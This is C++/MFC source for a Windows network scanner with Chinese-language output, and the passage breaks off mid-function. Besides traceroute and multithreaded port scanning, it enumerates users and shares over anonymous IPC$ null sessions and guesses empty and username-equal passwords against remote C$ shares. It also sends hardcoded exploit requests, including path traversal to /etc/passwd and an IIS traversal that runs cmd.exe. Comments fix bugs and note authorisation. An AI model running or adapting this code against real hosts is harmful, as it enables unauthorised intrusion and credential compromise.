// try4View.cpp : implementation of the CTry4View class
//
#include "stdafx.h"
#include "try4.h"
#include "try4Doc.h"
#include "try4View.h"
#include "CParamDlg.h"
#include "CModuleDlg.h"
#include "CHostName.h"
#include "CIPAddr.h"
#include "CNETTOIP.h"
#include "CPing.h"
#include "afxmt.h"
#include "CSocketFun.h"
#include "CNetBios.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
#define LOCALDRIVE "x:"   // drive letter GetNTWkPass maps the remote C$ share onto
// Scan settings defined in another translation unit (filled in by the option dialogs, presumably).
extern int gnScanOptions[5];
extern int gnStartPort;
extern int gnEndPort;
extern DWORD gdwStartIPAddr;
extern CString strStartIPAddr;
extern int nMaxHop;
extern int nMaxThread;
// Stop flag polled by every worker loop in this file; read and written without synchronization.
BOOL bStoped=true;
// Accumulated scan log that is pushed into the output edit control; appended from worker threads.
CString gMessage;
int nCount=0;
HTREEITEM hTreeCurrent;
CString strTreeCurrent;
// 文本框输出函数
// Append one "[host]message" line to the shared scan log and redraw the edit control with it.
// gMessage is a file-level global that worker threads append to; no locking is done here.
void AddToEdit(HWND hWnd,CString sg,CString strHost)
{
    CString line("\r\n[");
    line += strHost;
    line += "]";
    line += sg;
    gMessage += line;
    ::SetWindowText(hWnd, gMessage);
    ::UpdateWindow(hWnd);
}
//@@@@@@@@@@@@@@@@@@@ 扫描路由信息函数 ~~~~~~~~~~~~~BEGIN
// Arguments for the GetTraceInfo worker thread. The caller in this file fills the single
// global instance `rtp` and passes its address to AfxBeginThread, so the instance must not
// be reused while a trace is still running.
typedef struct ThreadParam_Route
{
CString strHost;   // target, dotted quad or host name
CTreeCtrl *pTC;    // tree control the hop entries are inserted into
HTREEITEM hTI;     // parent item of the hop entries
}ROUTETHREADPARAM;
ROUTETHREADPARAM rtp;
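// Worker thread: ICMP traceroute to route->strHost, one tree item per hop under route->hTI.
// Returns 0 in every case (the value is not used). Runs until the target answers, nMaxHop
// hops have been listed, TTL 255 is reached or bStoped is set.
UINT GetTraceInfo(LPVOID pParam)
{
    ROUTETHREADPARAM *route = (ROUTETHREADPARAM *)pParam;
    const int kMaxRetries = 3;   // unanswered probes tolerated per TTL before the hop is listed as "*"
    int MaxHop = 0;              // hops listed so far (answered or silent)
    int retries = 0;             // consecutive unanswered probes at the current TTL
    int ttl;
    CPing ping;
    struct in_addr iaDest;
    LPHOSTENT pHost, pHost1;
    DWORD dwAddress;
    IPINFO ipInfo;
    ICMPECHO icmpEcho;
    HANDLE hndlFile;

    if (!ping.bValid)
        return 0;

    // The target may be a dotted quad or a host name. The original ran a reverse lookup on a
    // dotted quad and aborted the whole trace when the address had no PTR record; a numeric
    // address needs no lookup at all.
    iaDest.S_un.S_addr = inet_addr(route->strHost);
    if (iaDest.S_un.S_addr != INADDR_NONE)
    {
        dwAddress = iaDest.S_un.S_addr;
    }
    else
    {
        pHost = gethostbyname(route->strHost);
        if (pHost == NULL || pHost->h_addr_list == NULL || pHost->h_addr_list[0] == NULL)
            return 0;
        dwAddress = *(DWORD *)(pHost->h_addr_list[0]);
    }

    hndlFile = ping.pIcmpCreateFile();
    // IcmpCreateFile reports failure with INVALID_HANDLE_VALUE; the original tested only for 0.
    if (hndlFile == 0 || hndlFile == INVALID_HANDLE_VALUE)
    {
        AfxMessageBox("Can't Open ICMP Handle!");
        return 0;
    }

    ipInfo.Tos = 0;
    ipInfo.IPFlags = 0;
    ipInfo.OptSize = 0;
    ipInfo.Options = NULL;
    icmpEcho.Status = 0;

    for (ttl = 1; ttl <= 255 && !bStoped; ttl++)
    {
        ipInfo.Ttl = ttl;
        if (ping.pIcmpSendEcho(hndlFile, dwAddress, NULL, 0, &ipInfo, &icmpEcho,
                               sizeof(struct tagICMPECHO), 1000) != 0)
        {
            iaDest.S_un.S_addr = icmpEcho.Address;
            CString sHostIP = inet_ntoa(iaDest);
            CString label = sHostIP;
            // Reverse-resolve the hop itself. The original printed the *target's* name
            // (pHost->h_name) next to every hop instead of the hop's own (pHost1->h_name).
            pHost1 = gethostbyaddr((const char *)&iaDest, sizeof(struct in_addr), AF_INET);
            if (pHost1 != NULL && pHost1->h_name != NULL)
                label.Format("%s[%s]", sHostIP, pHost1->h_name);
            route->pTC->InsertItem(label, 2, 2, route->hTI, TVI_LAST);
            MaxHop++;
            retries = 0;
            // Done when the reply came from the target. The original compared the hop's
            // dotted quad with the user's string, which never matched for a host name.
            if (icmpEcho.Address == dwAddress)
                break;
        }
        else if (++retries < kMaxRetries)
        {
            ttl--;   // probe the same TTL again
            continue;
        }
        else
        {
            // The original retried a silent hop forever (until bStoped); list it and move on.
            route->pTC->InsertItem("*", 2, 2, route->hTI, TVI_LAST);
            MaxHop++;
            retries = 0;
        }
        if (MaxHop >= nMaxHop)   // user-configured hop limit
            break;
    }
    ping.pIcmpCloseHandle(hndlFile);
    return 0;
}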
//~~~~~~~~~~~~~~~~~~~~ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ End
//%%%%%%%%%%%%%%%%%%%% 扫描端口线程 %%%%%%%%%%%%%%%%%%%%%%%%%%% BEGIN
// Guards NowWhere, the next port to probe, which all ScanPort threads share.
CCriticalSection cs;
int NowWhere=0;
// Arguments for the ScanPort worker threads. A single global instance `tp2` is filled by the
// caller in this file and handed to every thread.
typedef struct ThreadParam2
{
int nStartPort;    // first port of the range (NowWhere is initialised to it by the caller)
int nEndPort;      // last port of the range, inclusive
HWND hwnd;         // edit control that receives gMessage
CString strHost;   // target as a dotted quad (inet_addr is applied to it)
CTreeCtrl *pTC;    // tree control the open-port entries go into
HTREEITEM hTI;     // parent item of those entries
}THREADPARAM2;
THREADPARAM2 tp2;
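// Worker thread: TCP connect scan. Several threads run this body at once and share the port
// counter NowWhere (guarded by cs), each claiming the next unprobed port until the range
// nStartPort..nEndPort is exhausted or bStoped is set. Returns 0 (unused).
UINT ScanPort(LPVOID pParam)
{
    THREADPARAM2 *params = (THREADPARAM2 *)pParam;
    CSocketFun sf;
    sf.StartUp();

    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr(params->strHost);
    if (addr.sin_addr.s_addr == INADDR_NONE)
    {
        // Not a dotted quad: the original went on to connect() to 255.255.255.255 for every port.
        sf.CleanUp();
        return 0;
    }

    for (;;)
    {
        if (bStoped)
            break;

        // Claim the next port with the range check and the increment inside the lock. The
        // original tested NowWhere outside the lock, so two threads could both pass the test
        // and one of them would then probe nEndPort + 1.
        int nPort;
        cs.Lock();
        nPort = NowWhere;
        if (nPort <= params->nEndPort)
            NowWhere++;
        cs.Unlock();
        if (nPort > params->nEndPort || nPort < 0 || nPort > 65535)
            break;

        SOCKET conn = socket(AF_INET, SOCK_STREAM, 0);
        if (conn == INVALID_SOCKET)
        {
            AfxMessageBox("Can't Create Socket!");
            sf.CleanUp();
            return 0;
        }
        addr.sin_port = htons((u_short)nPort);
        if (connect(conn, (sockaddr *)&addr, sizeof(addr)) != SOCKET_ERROR)
        {
            CString temp;
            temp.Format("\r\n[%s]端口: %d 开放!", params->strHost, nPort);
            CString sss;
            sss.Format("端口: %d 开放", nPort);
            // gMessage is appended by every scanner thread; the original did this unlocked.
            cs.Lock();
            gMessage += temp;
            cs.Unlock();
            (params->pTC)->InsertItem(sss, 2, 2, params->hTI, TVI_LAST);
        }
        closesocket(conn);

        // Snapshot the log under the lock before handing it to the window.
        CString snapshot;
        cs.Lock();
        snapshot = gMessage;
        cs.Unlock();
        ::SetWindowText(params->hwnd, snapshot);
    }
    sf.CleanUp();
    return 0;
}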
//%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%END
//=================== 扫描NetBios信息函数 ===================BEGIN
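// Enumerate users, shares and OS information over an anonymous (null) IPC$ session to strHost,
// logging progress through hWnd and adding one summary item per successful query under hTI.
// The query results themselves are discarded here; only "done" markers are inserted.
void GetNetBios(HWND hWnd,CString strHost,CTreeCtrl *pTC,HTREEITEM hTI)
{
    CNetBios nb;
    char cHost[100];
    CString str;

    // Bounded copy of the host string. The original used wsprintf("%s") into the fixed
    // buffer, which overflows for a host string of 100 characters or more.
    strncpy(cHost, strHost, sizeof(cHost) - 1);
    cHost[sizeof(cHost) - 1] = '\0';

    if (!nb.OpenSession(cHost))
    {
        AddToEdit(hWnd, "建立IPC$空会话失败", strHost);
        return;
    }

    // `str` is cleared before each query so that a query which leaves it untouched cannot be
    // reported as a success on the strength of the previous one (whether the CNetBios
    // helpers reset it themselves is not visible here).
    str.Empty();
    nb.GetUsers(cHost, str);
    if (str != "")
    {
        AddToEdit(hWnd, "获取Netbios信息\"网络用户列表\"完成", strHost);
        pTC->InsertItem("用户列表", 2, 2, hTI, TVI_LAST);
    }

    str.Empty();
    nb.GetShareList(cHost, str);
    if (str != "")
    {
        AddToEdit(hWnd, "获取Netbios信息\"网络共享列表\"完成", strHost);
        pTC->InsertItem("共享列表", 2, 2, hTI, TVI_LAST);
    }

    str.Empty();
    nb.FingerPrint(cHost, str);
    if (str != "")
    {
        AddToEdit(hWnd, "获取Netbios信息\"远程操作系统信息\"完成", strHost);
        pTC->InsertItem("远程操作系统信息", 2, 2, hTI, TVI_LAST);
    }

    nb.CloseSession(nb.ipc);
}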
//==========================================================END
//!!!!!!!!!!!!!!!! 扫描NT Server弱口令函数 !!!!!!!!!!!!! BEGIN
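// Try two trivial credentials (empty password, password equal to the user name) against the
// target's C$ share for every user name listed in users.txt (one per line, read relative to
// the process working directory). Hits are logged through hWnd and added under hTI.
// Every attempt is a real logon on the target: failed attempts may count towards account
// lockout and are visible in its security log, so use only against hosts you are authorised
// to test.
void GetNTWkPass(HWND hWnd,CString strHost,CTreeCtrl *pTC,HTREEITEM hTI)
{
    FILE *fp;
    TCHAR name[20];

    // UNC path of the share. The original copied the host through two fixed buffers
    // (TCHAR[100], then char[60]) with wsprintf, which overflows on a long host string.
    CString strRemote;
    strRemote.Format(_T("\\\\%s\\c$"), strHost);

    if ((fp = fopen("users.txt", "r")) == NULL)
    {
        AfxMessageBox("Can't Open File!");
        return;
    }

    while (fgets(name, sizeof(name), fp) != NULL)
    {
        size_t len = strlen(name);
        if (len > 0 && name[len - 1] != '\n')
        {
            // No newline: either the last line of the file or a line longer than the buffer.
            // Discard the remainder so it is not taken as another user name next time round.
            // (The original always chopped the final character, newline or not.)
            int c;
            while ((c = fgetc(fp)) != EOF && c != '\n')
                ;
        }
        else if (len > 0)
        {
            name[--len] = '\0';
        }
        if (len == 0)
            continue;   // blank line, nothing to try

        NETRESOURCE nr;
        memset(&nr, 0, sizeof(nr));   // the original left the unused members uninitialised
        nr.lpProvider = NULL;
        nr.dwType = RESOURCETYPE_ANY;
        nr.lpLocalName = LOCALDRIVE;   // if this drive letter is already mapped, every attempt fails
        nr.lpRemoteName = (LPTSTR)(LPCTSTR)strRemote;   // WNetAddConnection2 does not modify it

        // Attempt 1: empty password.
        TCHAR password[20] = _T("");
        if (WNetAddConnection2(&nr, password, name, 0) == NO_ERROR)
        {
            CString str1;
            str1.Format("发现NT Server弱口令: %s/[空口令]", name);
            AddToEdit(hWnd, str1, strHost);
            CString str2;
            str2.Format("%s([空口令])", name);
            pTC->InsertItem(str2, 2, 2, hTI, TVI_LAST);
            WNetCancelConnection2(LOCALDRIVE, 0, TRUE);
            continue;
        }

        // Attempt 2: password identical to the user name.
        if (WNetAddConnection2(&nr, name, name, 0) == NO_ERROR)
        {
            CString str1;
            str1.Format("发现NT Server弱口令: %s/[用户名和口令相同]", name);
            AddToEdit(hWnd, str1, strHost);
            CString str2;
            str2.Format("%s([用户名和口令相同])", name);
            pTC->InsertItem(str2, 2, 2, hTI, TVI_LAST);
            WNetCancelConnection2(LOCALDRIVE, 0, TRUE);
        }
    }
    fclose(fp);
}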
//!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! END
//################### 扫描CGI漏洞函数 #################### BEGIN
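// Send a fixed list of historical CGI/IIS probe requests to port 80 of strHost and report
// every one whose response contains "HTTP/1.1 200 OK". That match is a heuristic: an
// HTTP/1.0 status line is missed and any 200 page (including a custom "not found" page served
// with 200) counts as a hit.
void CGIScan(HWND hWnd,CString strHost,CTreeCtrl *pTC,HTREEITEM hTI)
{
    struct sockaddr_in addr;
    WSADATA wsaData;
    char buff[1024];
    // Index 0 is unused to keep the original 1-based numbering. The backslashes in entries 2
    // and 5 were written as "\ " and "\h" in the original; those are unrecognised escapes
    // that the compiler reduces to a plain space / 'h', so the requests on the wire lacked
    // the backslash the probes rely on.
    const char *CGI[7];
    CGI[0] = NULL;
    CGI[1] = "GET /../../../../etc/passwd HTTP/1.0\n\n";
    CGI[2] = "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0\n\n";
    CGI[3] = "GET /A.ida/%c1%00.ida HTTP/1.0\n\n";
    CGI[4] = "GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0\n\n";
    CGI[5] = "GET /cgi-bin/test-cgi?\\help&0a/bin/cat%20/etc/passwd HTTP/1.0\n\n";
    CGI[6] = "GET /cgi-bin/test-cgi?* HTTP/1.0\n\n";
    const char *fmsg = "HTTP/1.1 200 OK";

    if (WSAStartup(MAKEWORD(1, 1), &wsaData))
    {
        AfxMessageBox("Winsock Initialization failed.");
        return;
    }

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(80);
    addr.sin_addr.s_addr = inet_addr(strHost);
    if (addr.sin_addr.s_addr == INADDR_NONE)
    {
        // Not a dotted quad; the original would have probed 255.255.255.255.
        WSACleanup();
        return;
    }

    for (int i = 1; i < 7 && !bStoped; i++)
    {
        // One socket per probe. The original created two sockets up front (leaking the first)
        // and reused the second for every connect(); a socket that has already connected, and
        // in practice one whose connect() failed, cannot be connected again, so only the
        // first probe was ever reliable.
        SOCKET sck = socket(AF_INET, SOCK_STREAM, 0);
        if (sck == INVALID_SOCKET)
        {
            AfxMessageBox("Can not create socket.");
            break;
        }
        if (connect(sck, (struct sockaddr *)&addr, sizeof(addr)) == 0)
        {
            if (send(sck, CGI[i], (int)strlen(CGI[i]), 0) != SOCKET_ERROR)
            {
                // Leave room for a terminator: the original handed the unterminated (and on a
                // short or failed recv, partly uninitialised) buffer to strstr(). Note that
                // recv() has no timeout here; a server that accepts and never answers blocks
                // the scan until the peer closes.
                int n = recv(sck, buff, sizeof(buff) - 1, 0);
                if (n > 0)
                {
                    buff[n] = '\0';
                    if (strstr(buff, fmsg) != NULL)
                    {
                        CString temp;
                        temp.Format("发现CGI漏洞: %s ", CGI[i]);
                        AddToEdit(hWnd, temp, strHost);
                        pTC->InsertItem(CGI[i], 2, 2, hTI, TVI_LAST);
                    }
                }
            }
        }
        closesocket(sck);
    }
    WSACleanup();
}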
//############################################################## END
//^^^^^^^^^^^^^^^^^^ 总扫描线程 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^BEGIN
// Arguments for the StartScan thread. A single global instance `tp1` exists for it.
typedef struct ThreadParam1
{
HWND hWnd;       // output edit control that receives gMessage
HWND hwnd;       // window redrawn after the root item is inserted
CTreeCtrl *pTC;  // result tree
}THREADPARAM1;
THREADPARAM1 tp1;
UINT StartScan(LPVOID pParam)
{
THREADPARAM1 *threadparam1=(THREADPARAM1 *)pParam;
// threadparam1->pTC->DeleteAllItems();
gMessage=_T("");
CString str;
str.Format("正在检测 %s...\r\n",strStartIPAddr);
gMessage+=str;
::SetWindowText(threadparam1->hWnd,gMessage);
::UpdateWindow(threadparam1->hWnd);
HTREEITEM hRoot=(threadparam1->pTC)->InsertItem(strStartIPAddr,0,0,TVI_ROOT,TVI_FIRST);
::UpdateWindow(threadparam1->hwnd);
CPing ping;
BOOL bResult = ping.Ping((char*)(LPCTSTR)strStartIPAddr);
// HWND hWnd=GetDlgItem(IDC_EDIT1)->GetSafeHwnd();
// HWND MainWnd=CWnd::m_hWnd;
if(bResult&&!bStoped)
{
if(gnScanOptions[0]==1)
{
AddToEdit(threadparam1->hWnd,"正在检测路由信息...",strStartIPAddr);
HTREEITEM hCh1=(threadparam1->pTC)->InsertItem("路由信息",1,1,hRoot,TVI_FIRST);
// (threadparam1->pTC)->InsertItem("172.....",2,2,hCh1,TVI_FIRST);
rtp.strHost = strStartIPAddr;
rtp.pTC = threadparam1->pTC;
rtp.hTI = hCh1;
AfxBeginThread(GetTraceInfo,&rtp,THREAD_PRIORITY_IDLE);
//(strStartIPAddr,threadparam1->pTC,hCh1);
AddToEdit(threadparam1->hWnd,"发现路由信息",strStartIPAddr);
AddToEdit(threadparam1->hWnd,"路由信息扫描完成",strStartIPAddr);
nCount++;
}
else
nCount++;
if(gnScanOptions[1]==1)
{
AddToEdit(threadparam1->hWnd,"正在检测开放端口...",strStartIPAddr);
HTREEITEM hCh2=(threadparam1->pTC)->InsertItem("开放端口",1,1,hRoot,TVI_LAST);
NowWhere=gnStartPort;
tp2.nStartPort = gnStartPort;
tp2.nEndPort = gnEndPort;
tp2.hwnd = threadparam1->hWnd;
tp2.strHost = strStartIPAddr;
tp2.pTC = threadparam1->pTC;